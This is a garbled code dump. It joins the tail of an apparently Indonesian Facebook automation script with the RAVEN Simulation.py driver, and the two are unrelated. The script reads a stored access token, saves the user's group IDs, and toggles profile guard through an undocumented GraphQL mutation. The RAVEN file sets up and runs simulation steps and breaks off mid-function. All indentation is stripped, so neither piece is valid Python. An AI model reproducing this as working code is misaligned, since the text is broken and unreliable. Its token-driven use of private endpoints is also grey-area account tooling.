toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
lisensi()
|
Simulation.py
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module that contains the driver for the whole the simulation flow (Simulation Class)
"""
import xml.etree.ElementTree as ET
import os,subprocess
import sys
import io
import string
import datetime
import numpy as np
import threading
import MessageHandler # this needs to happen early to instantiate message handler
from BaseClasses import MessageUser
import Steps
import DataObjects
import Files
import Samplers
import Optimizers
import Models
import Metrics
import Distributions
import Databases
import Functions
import OutStreams
from JobHandler import JobHandler
from utils import utils, TreeStructure, xmlUtils, mathUtils
import Decorators
from Application import __QtAvailable
from Interaction import Interaction
if __QtAvailable:
from Application import InteractiveApplication
# Load up plugins!
# -> only available on specially-marked base types
Models.Model.loadFromPlugins()
#----------------------------------------------------------------------------------------------------
class SimulationMode(MessageUser):
"""
SimulationMode allows changes to the how the simulation
runs are done. modifySimulation lets the mode change runInfoDict
and other parameters. remoteRunCommand lets a command to run RAVEN
remotely be specified.
"""
def __init__(self, *args):
"""
Constructor
@ In, args, list, unused positional arguments
@ Out, None
"""
super().__init__()
self.printTag = 'SIMULATION MODE'
def remoteRunCommand(self, runInfoDict):
"""
If this returns None, do nothing. If it returns a dictionary,
use the dictionary to run raven remotely.
@ In, runInfoDict, dict, the run info
@ Out, remoteRunCommand, dict, the information for the remote command.
The dictionary should have a "args" key that is used as a command to
a subprocess.call. It optionally can have a "cwd" for the current
working directory and a "env" for the environment to use for the command.
"""
return None
def modifyInfo(self, runInfoDict):
"""
modifySimulation is called after the runInfoDict has been setup.
This allows the mode to change any parameters that need changing.
This typically modifies the precommand and the postcommand that
are put infront of the command and after the command.
@ In, runInfoDict, dict, the run info
@ Out, dictionary to use for modifications. If empty, no changes
"""
import multiprocessing
newRunInfo = {}
try:
if multiprocessing.cpu_count() < runInfoDict['batchSize']:
self.raiseAWarning("cpu_count",multiprocessing.cpu_count(),"< batchSize",runInfoDict['batchSize'])
except NotImplementedError:
pass
if runInfoDict['NumThreads'] > 1:
newRunInfo['threadParameter'] = runInfoDict['threadParameter']
#add number of threads to the post command.
newRunInfo['postcommand'] =" {} {}".format(newRunInfo['threadParameter'],runInfoDict['postcommand'])
return newRunInfo
def XMLread(self,xmlNode):
"""
XMLread is called with the mode node, and can be used to
get extra parameters needed for the simulation mode.
@ In, xmlNode, xml.etree.ElementTree.Element, the xml node that belongs to this class instance
@ Out, None
"""
pass
#Note that this has to be after SimulationMode is defined or the CustomModes
#don't see SimulationMode when they import Simulation
import CustomModes
def splitCommand(s):
"""
Splits the string s into a list that can be used for the command
So for example splitCommand("ab bc c 'el f' \"bar foo\" ") ->
['ab', 'bc', 'c', 'el f', 'bar foo']
Bugs: Does not handle quoted strings with different kinds of quotes
@ In, s, string, the command to split
@ Out, retList, list, the list of splitted command
"""
n = 0
retList = []
inQuote = False
buffer = ""
while n < len(s):
current = s[n]
if current in string.whitespace and not inQuote:
if len(buffer) > 0:
#found end of command
retList.append(buffer)
buffer = ""
elif current in "\"'":
if inQuote:
inQuote = False
else:
inQuote = True
else:
buffer = buffer + current
n += 1
if len(buffer) > 0:
retList.append(buffer)
return retList
#----------------------------------------------------------------------
#
#
#
#-----------------------------------------------------------------------------------------------------
class Simulation(MessageUser):
"""
This is a class that contain all the object needed to run the simulation
Usage:
myInstance = Simulation() !Generate the instance
myInstance.XMLread(xml.etree.ElementTree.Element) !This method generate all the objects living in the simulation
myInstance.initialize() !This method takes care of setting up the directory/file environment with proper checks
myInstance.run() !This method run the simulation
Utility methods:
myInstance.printDicts !prints the dictionaries representing the whole simulation
myInstance.setInputFiles !re-associate the set of files owned by the simulation
myInstance.getDefaultInputFile !return the default name of the input file read by the simulation
Inherited from the BaseType class:
myInstance.whoAreYou() !inherited from BaseType class-
myInstance.myClassmyCurrentSetting() !see BaseType class-
--how to add a new entity <myClass> to the simulation--
Add an import for the module where it is defined. Convention is that the module is named with the plural
of the base class of the module: <MyModule>=<myClass>+'s'.
The base class of the module is by convention named as the new type of simulation component <myClass>.
The module should contain a set of classes named <myType> that are child of the base class <myClass>.
The module should possess a function <MyModule>.factory.returnInstance('<myType>') that returns a pointer to the class <myType>.
Add in Simulation.__init__ the following
self.<myClass>Dict = {}
self.entityModules['<myClass>'] = <MyModule>
self.entities['<myClass>' ] = self.<myClass>+'Dict'
The XML describing the new entity should be organized as it follows:
<MyModule (camelback with first letter capital)>
<MyType (camelback with first letter capital) name='here a user given name' subType='here additional specialization'>
<if needed more xml nodes>
</MyType>
</MyModule>
--Comments on the simulation environment--
every type of element living in the simulation should be uniquely identified by type and name not by sub-type
!!!!Wrong!!!!!!!!!!!!!!!!:
Class: distribution, type: normal, name: myDistribution
Class: distribution, type: triangular, name: myDistribution
Correct:
type: distribution, type: normal, name: myNormalDist
type: distribution, type: triangular, name: myTriDist
Using the attribute in the xml node <MyType> type discouraged to avoid confusion
"""
def __init__(self, frameworkDir, verbosity='all', interactive=Interaction.No):
"""
Constructor
@ In, frameworkDir, string, absolute path to framework directory
@ In, verbosity, string, optional, general verbosity level
@ In, interactive, Interaction, optional, toggles the ability to provide
an interactive UI or to run to completion without human interaction
@ Out, None
"""
super().__init__()
self.FIXME = False
#set the numpy print threshold to avoid ellipses in array truncation
np.set_printoptions(threshold=np.inf)
self.verbosity = verbosity
callerLength = 25
tagLength = 15
suppressErrs = False
self.messageHandler.initialize({'verbosity':self.verbosity,
'callerLength':callerLength,
'tagLength':tagLength,
'suppressErrs':suppressErrs})
readtime = datetime.datetime.fromtimestamp(self.messageHandler.starttime).strftime('%Y-%m-%d %H:%M:%S')
sys.path.append(os.getcwd())
#this dictionary contains the general info to run the simulation
self.runInfoDict = {}
self.runInfoDict['DefaultInputFile' ] = 'test.xml' #Default input file to use
self.runInfoDict['SimulationFiles' ] = [] #the xml input file
self.runInfoDict['ScriptDir' ] = os.path.join(os.path.dirname(frameworkDir),"scripts") # the location of the pbs script interfaces
self.runInfoDict['FrameworkDir' ] = frameworkDir # the directory where the framework is located
self.runInfoDict['RemoteRunCommand' ] = os.path.join(frameworkDir,'raven_qsub_command.sh')
self.runInfoDict['NodeParameter' ] = '-f' # the parameter used to specify the files where the nodes are listed
self.runInfoDict['MPIExec' ] = 'mpiexec' # the command used to run mpi commands
self.runInfoDict['threadParameter'] = '--n-threads=%NUM_CPUS%'# the command used to run multi-threading commands.
# The "%NUM_CPUS%" is a wildcard to replace. In this way for commands
# that require the num of threads to be inputted without a
# blank space we can have something like --my-nthreads=%NUM_CPUS%
# (e.g. --my-nthreads=10), otherwise we can have something like
# -omp %NUM_CPUS% (e.g. -omp 10). If not present, a blank
# space is always added (e.g. --mycommand => --mycommand 10)
self.runInfoDict['includeDashboard' ] = False # in case of internalParalle True, instanciate the RAY dashboard (https://docs.ray.io/en/master/ray-dashboard.html)? Default: False
self.runInfoDict['WorkingDir' ] = '' # the directory where the framework should be running
self.runInfoDict['TempWorkingDir' ] = '' # the temporary directory where a simulation step is run
self.runInfoDict['NumMPI' ] = 1 # the number of mpi process by run
self.runInfoDict['NumThreads' ] = 1 # Number of Threads by run
self.runInfoDict['numProcByRun' ] = 1 # Total number of core used by one run (number of threads by number of mpi)
self.runInfoDict['batchSize' ] = 1 # number of contemporaneous runs
self.runInfoDict['internalParallel' ] = False # activate internal parallel (parallel python). If True parallel python is used, otherwise multi-threading is used
self.runInfoDict['ParallelCommand' ] = '' # the command that should be used to submit jobs in parallel (mpi)
self.runInfoDict['ThreadingCommand' ] = '' # the command should be used to submit multi-threaded
self.runInfoDict['totalNumCoresUsed' ] = 1 # total number of cores used by driver
self.runInfoDict['queueingSoftware' ] = '' # queueing software name
self.runInfoDict['stepName' ] = '' # the name of the step currently running
self.runInfoDict['precommand' ] = '' # Add to the front of the command that is run
self.runInfoDict['postcommand' ] = '' # Added after the command that is run.
self.runInfoDict['delSucLogFiles' ] = False # If a simulation (code run) has not failed, delete the relative log file (if True)
self.runInfoDict['deleteOutExtension'] = [] # If a simulation (code run) has not failed, delete the relative output files with the listed extension (comma separated list, for example: 'e,r,txt')
self.runInfoDict['mode' ] = '' # Running mode. Curently the only mode supported is mpi but others can be added with custom modes.
self.runInfoDict['Nodes' ] = [] # List of node IDs. Filled only in case RAVEN is run in a DMP machine
self.runInfoDict['expectedTime' ] = '10:00:00' # How long the complete input is expected to run.
self.runInfoDict['logfileBuffer' ] = int(io.DEFAULT_BUFFER_SIZE)*50 # logfile buffer size in bytes
self.runInfoDict['clusterParameters' ] = [] # Extra parameters to use with the qsub command.
self.runInfoDict['maxQueueSize' ] = None
#Following a set of dictionaries that, in a manner consistent with their names, collect the instance of all objects needed in the simulation
#Theirs keywords in the dictionaries are the the user given names of data, sampler, etc.
#The value corresponding to a keyword is the instance of the corresponding class
self.stepsDict = {}
self.dataDict = {}
self.samplersDict = {}
self.modelsDict = {}
self.distributionsDict = {}
self.dataBasesDict = {}
self.functionsDict = {}
self.filesDict = {} # for each file returns an instance of a Files class
self.metricsDict = {}
self.outStreamsDict = {}
self.stepSequenceList = [] #the list of step of the simulation
#list of supported queue-ing software:
self.knownQueueingSoftware = []
self.knownQueueingSoftware.append('None')
self.knownQueueingSoftware.append('PBS Professional')
#Dictionary of mode handlers for the
self.__modeHandlerDict = CustomModes.modeHandlers
#self.__modeHandlerDict['mpi'] = CustomModes.MPISimulationMode
#self.__modeHandlerDict['mpilegacy'] = CustomModes.MPILegacySimulationMode
#this dictionary contain the static factory that return the instance of one of the allowed entities in the simulation
#the keywords are the name of the module that contains the specialization of that specific entity
self.entityModules = {}
self.entityModules['Steps' ] = Steps
self.entityModules['DataObjects' ] = DataObjects
self.entityModules['Samplers' ] = Samplers
self.entityModules['Optimizers' ] = Optimizers
self.entityModules['Models' ] = Models
self.entityModules['Distributions' ] = Distributions
self.entityModules['Databases' ] = Databases
self.entityModules['Functions' ] = Functions
self.entityModules['Files' ] = Files
self.entityModules['Metrics' ] = Metrics
self.entityModules['OutStreams' ] = OutStreams
#Mapping between an entity type and the dictionary containing the instances for the simulation
self.entities = {}
self.entities['Steps' ] = self.stepsDict
self.entities['DataObjects' ] = self.dataDict
self.entities['Samplers' ] = self.samplersDict
self.entities['Optimizers' ] = self.samplersDict
self.entities['Models' ] = self.modelsDict
self.entities['RunInfo' ] = self.runInfoDict
self.entities['Files' ] = self.filesDict
self.entities['Distributions' ] = self.distributionsDict
self.entities['Databases' ] = self.dataBasesDict
self.entities['Functions' ] = self.functionsDict
self.entities['Metrics' ] = self.metricsDict
self.entities['OutStreams' ] = self.outStreamsDict
# The QApplication
## The benefit of this enumerated type is that anything other than
## Interaction.No will evaluate to true here and correctly make the
## interactive app.
if interactive:
self.app = InteractiveApplication([], interactive)
else:
self.app = None
#the handler of the runs within each step
self.jobHandler = JobHandler()
#handle the setting of how the jobHandler act
self.__modeHandler = SimulationMode(self)
self.printTag = 'SIMULATION'
self.raiseAMessage('Simulation started at',readtime,verbosity='silent')
self.pollingThread = threading.Thread(target=self.jobHandler.startLoop)
## This allows RAVEN to exit when the only thing left is the JobHandler
## This should no longer be necessary since the jobHandler now has an off
## switch that this object can flip when it is complete, however, if
## simulation fails before it is finished, we should probably still ensure
## that this thread is killed as well, so maybe it is best to keep it for
## now.
self.pollingThread.daemon = True
self.pollingThread.start()
@Decorators.timingProfile
def setInputFiles(self,inputFiles):
"""
Method that can be used to set the input files that the program received.
These are currently used for cluster running where the program
needs to be restarted on a different node.
@ In, inputFiles, list, input files list
@ Out, None
"""
self.runInfoDict['SimulationFiles' ] = inputFiles
def getDefaultInputFile(self):
"""
Returns the default input file to read
@ In, None
@ Out, defaultInputFile, string, default input file
"""
defaultInputFile = self.runInfoDict['DefaultInputFile']
return defaultInputFile
def __createAbsPath(self,fileIn):
"""
Assuming that the file in is already in the self.filesDict it places, as value, the absolute path
@ In, fileIn, string, the file name that needs to be made "absolute"
@ Out, None
"""
curfile = self.filesDict[fileIn]
path = os.path.normpath(self.runInfoDict['WorkingDir'])
curfile.prependPath(path) #this respects existing path from the user input, if any
def XMLpreprocess(self,node,cwd):
"""
Preprocess the input file, load external xml files into the main ET
@ In, node, TreeStructure.InputNode, element of RAVEN input file
@ In, cwd, string, current working directory (for relative path searches)
@ Out, None
"""
xmlUtils.expandExternalXML(node,cwd)
def XMLread(self,xmlNode,runInfoSkip = set(),xmlFilename=None):
"""
parses the xml input file, instances the classes need to represent all objects in the simulation
@ In, xmlNode, ElementTree.Element, xml node to read in
@ In, runInfoSkip, set, optional, nodes to skip
@ In, xmlFilename, string, optional, xml filename for relative directory
@ Out, None
"""
self.raiseADebug("Reading XML", xmlFilename)
#TODO update syntax to note that we read InputTrees not XmlTrees
unknownAttribs = utils.checkIfUnknowElementsinList(['printTimeStamps','verbosity','color','profile'],list(xmlNode.attrib.keys()))
if len(unknownAttribs) > 0:
errorMsg = 'The following attributes are unknown:'
for element in unknownAttribs:
errorMsg += ' ' + element
self.raiseAnError(IOError,errorMsg)
self.verbosity = xmlNode.attrib.get('verbosity','all').lower()
if 'printTimeStamps' in xmlNode.attrib.keys():
self.raiseADebug('Setting "printTimeStamps" to',xmlNode.attrib['printTimeStamps'])
self.messageHandler.setTimePrint(xmlNode.attrib['printTimeStamps'])
if 'color' in xmlNode.attrib.keys():
self.raiseADebug('Setting color output mode to',xmlNode.attrib['color'])
self.messageHandler.setColor(xmlNode.attrib['color'])
if 'profile' in xmlNode.attrib.keys():
thingsToProfile = list(p.strip().lower() for p in xmlNode.attrib['profile'].split(','))
if 'jobs' in thingsToProfile:
self.jobHandler.setProfileJobs(True)
self.messageHandler.verbosity = self.verbosity
runInfoNode = xmlNode.find('RunInfo')
if runInfoNode is None:
self.raiseAnError(IOError,'The RunInfo node is missing!')
self.__readRunInfo(runInfoNode,runInfoSkip,xmlFilename)
### expand variable groups before continuing ###
## build variable groups ##
varGroupNode = xmlNode.find('VariableGroups')
# init, read XML for variable groups
if varGroupNode is not None:
varGroups = mathUtils.readVariableGroups(varGroupNode)
else:
varGroups={}
# read other nodes
for child in xmlNode:
if child.tag == 'VariableGroups':
continue #we did these before the for loop
xmlUtils.replaceVariableGroups(child, varGroups)
if child.tag in self.entities:
className = child.tag
# we already took care of RunInfo block
if className in ['RunInfo']:
continue
self.raiseADebug('-'*2+' Reading the block: {0:15}'.format(str(child.tag))+2*'-')
if len(child.attrib) == 0:
globalAttributes = {}
else:
globalAttributes = child.attrib
module = self.entityModules[className]
if module.factory.returnInputParameter:
paramInput = module.returnInputParameter()
paramInput.parseNode(child)
for childChild in paramInput.subparts:
childName = childChild.getName()
entity = module.factory.returnInstance(childName)
entity.applyRunInfo(self.runInfoDict)
entity.handleInput(childChild, globalAttributes=globalAttributes)
name = entity.name
self.entities[className][name] = entity
else:
for childChild in child:
kind, name, entity = module.factory.instanceFromXML(childChild)
self.raiseADebug(f'Reading class "{kind}" named "{name}" ...')
#place the instance in the proper dictionary (self.entities[Type]) under his name as key,
#the type is the general class (sampler, data, etc) while childChild.tag is the sub type
if name in self.entities[className]:
self.raiseAnError(IOError, f'Two objects of class "{className}" have the same name "{name}"!')
self.entities[className][name] = entity
entity.applyRunInfo(self.runInfoDict)
entity.readXML(childChild, varGroups, globalAttributes=globalAttributes)
else:
#tag not in entities, check if it's a documentation tag
if child.tag not in ['TestInfo']:
self.raiseAnError(IOError,'<'+child.tag+'> is not among the known simulation components '+repr(child))
# If requested, duplicate input
# ###NOTE: All substitutions to the XML input tree should be done BEFORE this point!!
if self.runInfoDict.get('printInput',False):
fileName = os.path.join(self.runInfoDict['WorkingDir'],self.runInfoDict['printInput'])
self.raiseAMessage('Writing duplicate input file:',fileName)
outFile = open(fileName,'w')
outFile.writelines(utils.toString(TreeStructure.tostring(xmlNode))+'\n') #\n for no-end-of-line issue
outFile.close()
if not set(self.stepSequenceList).issubset(set(self.stepsDict.keys())):
self.raiseAnError(IOError,'The step list: '+str(self.stepSequenceList)+' contains steps that have not been declared: '+str(list(self.stepsDict.keys())))
def initialize(self):
"""
Method to initialize the simulation.
Check/created working directory, check/set up the parallel environment, call step consistency checker
@ In, None
@ Out, None
"""
#move the full simulation environment in the working directory
self.raiseADebug('Moving to working directory:',self.runInfoDict['WorkingDir'])
os.chdir(self.runInfoDict['WorkingDir'])
#add also the new working dir to the path
sys.path.append(os.getcwd())
# clear the raven status file, if any
self.clearStatusFile()
#check consistency and fill the missing info for the // runs (threading, mpi, batches)
self.runInfoDict['numProcByRun'] = self.runInfoDict['NumMPI']*self.runInfoDict['NumThreads']
oldTotalNumCoresUsed = self.runInfoDict['totalNumCoresUsed']
self.runInfoDict['totalNumCoresUsed'] = self.runInfoDict['numProcByRun']*self.runInfoDict['batchSize']
if self.runInfoDict['totalNumCoresUsed'] < oldTotalNumCoresUsed:
#This is used to reserve some cores
self.runInfoDict['totalNumCoresUsed'] = oldTotalNumCoresUsed
elif oldTotalNumCoresUsed > 1:
#If 1, probably just default
self.raiseAWarning("overriding totalNumCoresUsed",oldTotalNumCoresUsed,"to", self.runInfoDict['totalNumCoresUsed'])
#transform all files in absolute path
for key in self.filesDict.keys():
self.__createAbsPath(key)
#Let the mode handler do any modification here
newRunInfo = self.__modeHandler.modifyInfo(dict(self.runInfoDict))
for key in newRunInfo:
#Copy in all the new keys
self.runInfoDict[key] = newRunInfo[key]
self.jobHandler.applyRunInfo(self.runInfoDict)
self.jobHandler.initialize()
# only print the dictionaries when the verbosity is set to debug
#if self.verbosity == 'debug': self.printDicts()
for stepName, stepInstance in self.stepsDict.items():
self.checkStep(stepInstance,stepName)
def checkStep(self,stepInstance,stepName):
"""
This method checks the coherence of the simulation step by step
@ In, stepInstance, instance, instance of the step
@ In, stepName, string, the name of the step to check
@ Out, None
"""
for [role, myClass, objectType, name] in stepInstance.parList:
if myClass != 'Step' and myClass not in list(self.entities.keys()):
self.raiseAnError(IOError, f'For step named "{stepName}" the role "{role}" has been ' +
f'assigned to an unknown class type "{myClass}"!')
if name not in self.entities[myClass]:
self.raiseADebug('name:',name)
self.raiseADebug('myClass:',myClass)
self.raiseADebug('list:',list(self.entities[myClass].keys()))
self.raiseADebug('entities[myClass]',self.entities[myClass])
self.raiseAnError(IOError, f'In step "{stepName}" the class "{myClass}" named "{name}" ' +
f'supposed to be used for the role "{role}" has not been found!')
if myClass != 'Files':
# check if object type is consistent
objtype = self.entities[myClass][name].type
def __readRunInfo(self,xmlNode,runInfoSkip,xmlFilename):
"""
Method that reads the xml input file for the RunInfo block
@ In, xmlNode, xml.etree.Element, the xml node that belongs to Simulation
@ In, runInfoSkip, string, the runInfo step to skip
@ In, xmlFilename, string, xml input file name
@ Out, None
"""
if 'verbosity' in xmlNode.attrib.keys():
self.verbosity = xmlNode.attrib['verbosity']
self.raiseAMessage('Global verbosity level is "',self.verbosity,'"',verbosity='quiet')
for element in xmlNode:
if element.tag in runInfoSkip:
self.raiseAWarning("Skipped element ",element.tag)
elif element.tag == 'printInput':
text = element.text.strip() if element.text is not None else ''
#extension fixing
if len(text) >= 4 and text[-4:].lower() == '.xml':
text = text[:-4]
# if the user asked to not print input instead of leaving off tag, respect it
if utils.stringIsFalse(text):
self.runInfoDict['printInput'] = False
# if the user didn't provide a name, provide a default
elif len(text)<1:
self.runInfoDict['printInput'] = 'duplicated_input.xml'
# otherwise, use the user-provided name
else:
self.runInfoDict['printInput'] = text+'.xml'
elif element.tag == 'WorkingDir':
# first store the cwd, the "CallDir"
self.runInfoDict['CallDir'] = os.getcwd()
# then get the requested "WorkingDir"
tempName = element.text
if element.text is None:
self.raiseAnError(IOError, 'RunInfo.WorkingDir is empty! Use "." to signify "work here" or specify a directory.')
if '~' in tempName:
tempName = os.path.expanduser(tempName)
xmlDirectory = os.path.dirname(os.path.abspath(xmlFilename))
self.runInfoDict['InputDir'] = xmlDirectory
if os.path.isabs(tempName):
self.runInfoDict['WorkingDir'] = tempName
elif "runRelative" in element.attrib:
self.runInfoDict['WorkingDir'] = os.path.abspath(tempName)
else:
if xmlFilename == None:
self.raiseAnError(IOError,'Relative working directory requested but xmlFilename is None.')
# store location of the input
xmlDirectory = os.path.dirname(os.path.abspath(xmlFilename))
self.runInfoDict['InputDir'] = xmlDirectory
rawRelativeWorkingDir = element.text.strip()
# working dir is file location + relative working dir
self.runInfoDict['WorkingDir'] = os.path.join(xmlDirectory,rawRelativeWorkingDir)
utils.makeDir(self.runInfoDict['WorkingDir'])
elif element.tag == 'maxQueueSize':
try:
self.runInfoDict['maxQueueSize'] = int(element.text)
except ValueError:
self.raiseAnError('Value give for RunInfo.maxQueueSize could not be converted to integer: {}'.format(element.text))
elif element.tag == 'RemoteRunCommand':
tempName = element.text
if '~' in tempName:
tempName = os.path.expanduser(tempName)
if os.path.isabs(tempName):
self.runInfoDict['RemoteRunCommand'] = tempName
else:
self.runInfoDict['RemoteRunCommand'] = os.path.abspath(os.path.join(self.runInfoDict['FrameworkDir'],tempName))
elif element.tag == 'NodeParameter':
self.runInfoDict['NodeParameter'] = element.text.strip()
elif element.tag == 'MPIExec':
self.runInfoDict['MPIExec'] = element.text.strip()
elif element.tag == 'threadParameter':
self.runInfoDict['threadParameter'] = element.text.strip()
elif element.tag == 'JobName':
self.runInfoDict['JobName' ] = element.text.strip()
elif element.tag == 'ParallelCommand':
self.runInfoDict['ParallelCommand' ] = element.text.strip()
elif element.tag == 'queueingSoftware':
self.runInfoDict['queueingSoftware' ] = element.text.strip()
elif element.tag == 'ThreadingCommand':
self.runInfoDict['ThreadingCommand' ] = element.text.strip()
elif element.tag == 'NumThreads':
self.runInfoDict['NumThreads' ] = int(element.text)
elif element.tag == 'totalNumCoresUsed':
self.runInfoDict['totalNumCoresUsed' ] = int(element.text)
elif element.tag == 'NumMPI':
self.runInfoDict['NumMPI' ] = int(element.text)
elif element.tag == 'internalParallel':
self.runInfoDict['internalParallel' ] = utils.interpretBoolean(element.text)
dashboard = element.attrib.get("dashboard",'False')
self.runInfoDict['includeDashboard' ] = utils.interpretBoolean(dashboard)
elif element.tag == 'batchSize':
self.runInfoDict['batchSize' ] = int(element.text)
elif element.tag.lower() == 'maxqueuesize':
self.runInfoDict['maxQueueSize' ] = int(element.text)
elif element.tag == 'MaxLogFileSize':
self.runInfoDict['MaxLogFileSize' ] = int(element.text)
elif element.tag == 'precommand':
self.runInfoDict['precommand' ] = element.text
elif element.tag == 'postcommand':
self.runInfoDict['postcommand' ] = element.text
elif element.tag == 'deleteOutExtension':
self.runInfoDict['deleteOutExtension'] = element.text.strip().split(',')
elif element.tag == 'headNode':
self.runInfoDict['headNode'] = element.text.strip()
elif element.tag == 'redisPassword':
self.runInfoDict['redisPassword'] = element.text.strip()
elif element.tag == 'remoteNodes':
self.runInfoDict['remoteNodes'] = [el.strip() for el in element.text.strip().split(',')]
elif element.tag == 'PYTHONPATH':
self.runInfoDict['UPDATE_PYTHONPATH'] = element.text.strip()
elif element.tag == 'delSucLogFiles' :
if utils.stringIsTrue(element.text):
self.runInfoDict['delSucLogFiles' ] = True
else:
self.runInfoDict['delSucLogFiles' ] = False
elif element.tag == 'logfileBuffer':
self.runInfoDict['logfileBuffer'] = utils.convertMultipleToBytes(element.text.lower())
elif element.tag == 'clusterParameters':
self.runInfoDict['clusterParameters'].extend(splitCommand(element.text)) #extend to allow adding parameters at different points.
elif element.tag == 'mode' :
self.runInfoDict['mode'] = element.text.strip().lower()
#parallel environment
if self.runInfoDict['mode'] in self.__modeHandlerDict:
self.__modeHandler = self.__modeHandlerDict[self.runInfoDict['mode']](self)
self.__modeHandler.XMLread(element)
else:
self.raiseAnError(IOError,"Unknown mode "+self.runInfoDict['mode'])
elif element.tag == 'expectedTime':
self.runInfoDict['expectedTime' ] = element.text.strip()
elif element.tag == 'Sequence':
for stepName in element.text.split(','):
self.stepSequenceList.append(stepName.strip())
elif element.tag == 'DefaultInputFile':
self.runInfoDict['DefaultInputFile'] = element.text.strip()
elif element.tag == 'CustomMode' :
modeName = element.text.strip()
modeClass = element.attrib["class"]
modeFile = element.attrib["file"]
#XXX This depends on if the working directory has been set yet.
# So switching the order of WorkingDir and CustomMode can
# cause different results.
modeFile = modeFile.replace("%BASE_WORKING_DIR%",self.runInfoDict['WorkingDir'])
modeFile = modeFile.replace("%FRAMEWORK_DIR%",self.runInfoDict['FrameworkDir'])
modeDir, modeFilename = os.path.split(modeFile)
if modeFilename.endswith(".py"):
modeModulename = modeFilename[:-3]
else:
modeModulename = modeFilename
os.sys.path.append(modeDir)
module = __import__(modeModulename)
if modeName in self.__modeHandlerDict:
self.raiseAWarning("duplicate mode definition " + modeName)
self.__modeHandlerDict[modeName] = module.__dict__[modeClass]
else:
self.raiseAnError(IOError,'RunInfo element "'+element.tag +'" unknown!')
def printDicts(self):
"""
utility function capable to print a summary of the dictionaries
@ In, None
@ Out, None
"""
def __prntDict(Dict,msg):
"""utility function capable to print a dictionary"""
for key in Dict:
msg+=key+'= '+str(Dict[key])+'\n'
return msg
msg=''
msg=__prntDict(self.runInfoDict,msg)
msg=__prntDict(self.stepsDict,msg)
msg=__prntDict(self.dataDict,msg)
msg=__prntDict(self.samplersDict,msg)
msg=__prntDict(self.modelsDict,msg)
msg=__prntDict(self.metricsDict,msg)
#msg=__prntDict(self.testsDict,msg)
msg=__prntDict(self.filesDict,msg)
msg=__prntDict(self.dataBasesDict,msg)
msg=__prntDict(self.outStreamsDict,msg)
msg=__prntDict(self.entityModules,msg)
msg=__prntDict(self.entities,msg)
self.raiseADebug(msg)
def run(self):
"""
Run the simulation
@ In, None
@ Out, None
"""
#to do list
#can we remove the check on the existence of the file, it might make more sense just to check in case they are input and before the step they are used
self.raiseADebug('entering the run')
#controlling the PBS environment
remoteRunCommand = self.__modeHandler.remoteRunCommand(dict(self.runInfoDict))
if remoteRunCommand is not None:
subprocess.call(args=remoteRunCommand["args"],
cwd=remoteRunCommand.get("cwd", None),
env=remoteRunCommand.get("env", None))
self.raiseADebug('Submitted in queue! Shutting down Jobhandler!')
self.jobHandler.shutdown()
return
#loop over the steps of the simulation
for stepName in self.stepSequenceList:
